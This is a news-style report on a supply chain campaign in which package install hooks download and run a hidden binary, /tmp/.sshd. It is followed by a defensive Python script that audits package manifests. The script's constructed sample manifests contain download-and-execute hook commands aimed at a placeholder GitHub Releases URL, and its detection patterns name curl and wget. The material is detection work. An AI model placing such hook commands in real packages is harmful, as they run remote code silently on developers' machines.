A covert supply chain attack is targeting developers through software packages that fetch a Linux binary hosted on GitHub. The dropped binary, disguised under a filename that mimics a standard system process, has been traced to over 700 repositories across several ecosystems.
How the Attack Operates
The threat is introduced via a harmful postinstall script within PHP and Node.js packages. When these compromised packages are installed, the script operates without alerting the user, fetching a binary from an attacker-controlled GitHub account. It stores this binary in a temporary directory on the Linux system, under the file path /tmp/.sshd, which resembles a legitimate SSH daemon file.
Researchers from Socket.dev revealed this campaign through their AI-driven scanner, which flagged the packages based on their unusual behavior during installation. The campaign turned out to be broader than the initial findings, affecting both Packagist (PHP) and Node.js packages.
Stealth Tactics and Widespread Impact
This attack is particularly hard to detect because of its stealthy nature. The script suppresses errors during installation and runs the binary in the background unnoticed. Developers examining typical installation logs would likely miss the malicious process: the dot-prefixed name keeps the file out of a plain directory listing, and the "sshd" disguise blends it into the system environment.
The central point for payload delivery was identified as a GitHub account named parikhrpreksha. Consistent postinstall commands were found across numerous repositories, all downloading the same binary from a GitHub Releases URL, indicating a coordinated operation.
Preventative Measures and Recommendations
Given the attack's reach, Socket.dev has reported the affected packages, which were subsequently removed from Packagist. However, because many of the packages were consumed through branch-tracking versions, Composer resolves them straight from the upstream Git repository rather than from a tagged release, so developers must ensure that those upstream repositories are also cleared of malicious code.
Teams using Packagist packages with PHP scripting or Laravel-based tools should scrutinize composer.json files for unexpected entries, in particular install-time scripts. It is also important to check /tmp for binaries with dot-prefixed names, review GitHub Actions workflow files, and audit packages pinned to development branches rather than stable releases.
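The following is an added example, not Socket.dev's scanner or any code from the campaign, that turns the warning signs described above into a manifest audit: it parses a composer.json or package.json, flags install-time hooks whose commands download remote content, reference a GitHub Releases URL, write into /tmp, use a dot-prefixed name, suppress errors or background a process, lists dependencies pinned to a branch or git ref instead of a release, and reports dot-prefixed files present in /tmp. The two sample manifests, the placeholder `EXAMPLE-ACCOUNT`/`EXAMPLE-REPO` names and the heuristic patterns are all constructed for this example; the hook names are the standard Composer and npm lifecycle scripts.

```python
import json
import os
import re
from typing import Dict, Iterable, List

# Added example: heuristic manifest audit, not the researchers' scanner.
# Hooks that Composer and npm run automatically during install/update.
COMPOSER_HOOKS = {"pre-install-cmd", "post-install-cmd", "pre-update-cmd",
                  "post-update-cmd", "post-autoload-dump"}
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Heuristics mirroring the campaign's traits: remote download, GitHub Releases
# URL, /tmp drop location, dot-prefixed name, error suppression, backgrounding.
SUSPICIOUS_PATTERNS = {
    "downloads remote content": re.compile(r"\b(curl|wget)\b"),
    "references GitHub Releases": re.compile(r"github\.com/\S+/releases/"),
    "writes into /tmp": re.compile(r"/tmp/"),
    "dot-prefixed filename": re.compile(r"/\.[A-Za-z0-9_-]+"),
    "suppresses errors": re.compile(r"2>\s*/dev/null|\|\|\s*true"),
    "runs in background": re.compile(r"&\s*$|\bnohup\b"),
}

# Constraints that follow a branch or git ref instead of a tagged release
# (Composer "dev-*" / "@dev"; npm "github:", "#ref", "git+" URLs).
BRANCH_CONSTRAINT = re.compile(r"^dev-|@dev$|#|^git\+|^github:")


def suspicious_reasons(command: str) -> List[str]:
    """Return the heuristic labels that match one shell command line."""
    return [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]


def scan_hooks(manifest: dict, hook_names: Iterable[str]) -> List[Dict[str, object]]:
    """Flag install-time hooks whose commands trip any heuristic."""
    findings = []
    for hook, value in manifest.get("scripts", {}).items():
        if hook not in hook_names:
            continue
        # Composer allows a list of commands per hook; npm uses a single string.
        for command in (value if isinstance(value, list) else [value]):
            reasons = suspicious_reasons(command)
            if reasons:
                findings.append({"hook": hook, "command": command, "reasons": reasons})
    return findings


def branch_tracking_deps(manifest: dict, dep_keys: Iterable[str]) -> List[str]:
    """List dependencies whose constraint tracks a branch/ref, not a release."""
    flagged = []
    for key in dep_keys:
        for name, constraint in manifest.get(key, {}).items():
            if isinstance(constraint, str) and BRANCH_CONSTRAINT.search(constraint):
                flagged.append(f"{name} ({constraint})")
    return flagged


def audit(manifest: dict, kind: str) -> Dict[str, object]:
    """Audit a parsed composer.json (kind='composer') or package.json (kind='npm')."""
    if kind == "composer":
        hooks, dep_keys = COMPOSER_HOOKS, ("require", "require-dev")
    else:
        hooks, dep_keys = NPM_HOOKS, ("dependencies", "devDependencies", "optionalDependencies")
    return {"hooks": scan_hooks(manifest, hooks),
            "branch_tracking": branch_tracking_deps(manifest, dep_keys)}


def dotfile_names(entries: Iterable[str]) -> List[str]:
    """Dot-prefixed names from a directory listing (the campaign dropped /tmp/.sshd)."""
    return sorted(e for e in entries if e.startswith(".") and e not in (".", ".."))


def hidden_tmp_files(tmp_dir: str = "/tmp") -> List[str]:
    """Regular dot-prefixed files currently present in the temp directory."""
    try:
        names = dotfile_names(os.listdir(tmp_dir))
    except OSError:
        return []
    return [os.path.join(tmp_dir, n) for n in names if os.path.isfile(os.path.join(tmp_dir, n))]


# Constructed sample manifests; EXAMPLE-ACCOUNT / EXAMPLE-REPO are placeholders.
SAMPLE_COMPOSER = json.loads("""{
  "name": "example/constructed-package",
  "require": {"vendor/helper": "dev-main", "vendor/stable": "^2.1"},
  "scripts": {
    "post-install-cmd": [
      "curl -sL https://github.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/releases/download/v1/payload -o /tmp/.sshd; chmod +x /tmp/.sshd; /tmp/.sshd &",
      "@php artisan package:discover"
    ]
  }
}""")

SAMPLE_PACKAGE = json.loads("""{
  "name": "constructed-example",
  "dependencies": {"tidy-lib": "^1.0.0", "some-lib": "github:EXAMPLE-ACCOUNT/some-lib#main"},
  "scripts": {
    "postinstall": "wget -q -O /tmp/.sshd https://github.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/releases/download/v1/payload || true; nohup /tmp/.sshd >/dev/null 2>&1 &",
    "test": "node test.js"
  }
}""")

if __name__ == "__main__":
    for kind, manifest in (("composer", SAMPLE_COMPOSER), ("npm", SAMPLE_PACKAGE)):
        print(f"== {kind}: {manifest['name']} ==")
        print(json.dumps(audit(manifest, kind), indent=2))
    print("dot-prefixed files in /tmp:", hidden_tmp_files())
```

The `suspicious_reasons` helper works on any shell snippet, so the `run:` steps of GitHub Actions workflow files can be fed through it as well. The patterns are deliberately broad: a legitimate hook that downloads a release asset will also be flagged, which is the intent, since any install-time fetch deserves a human look.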
This incident underscores the need for vigilance in software package management, emphasizing the importance of regular audits and updates to mitigate potential threats.
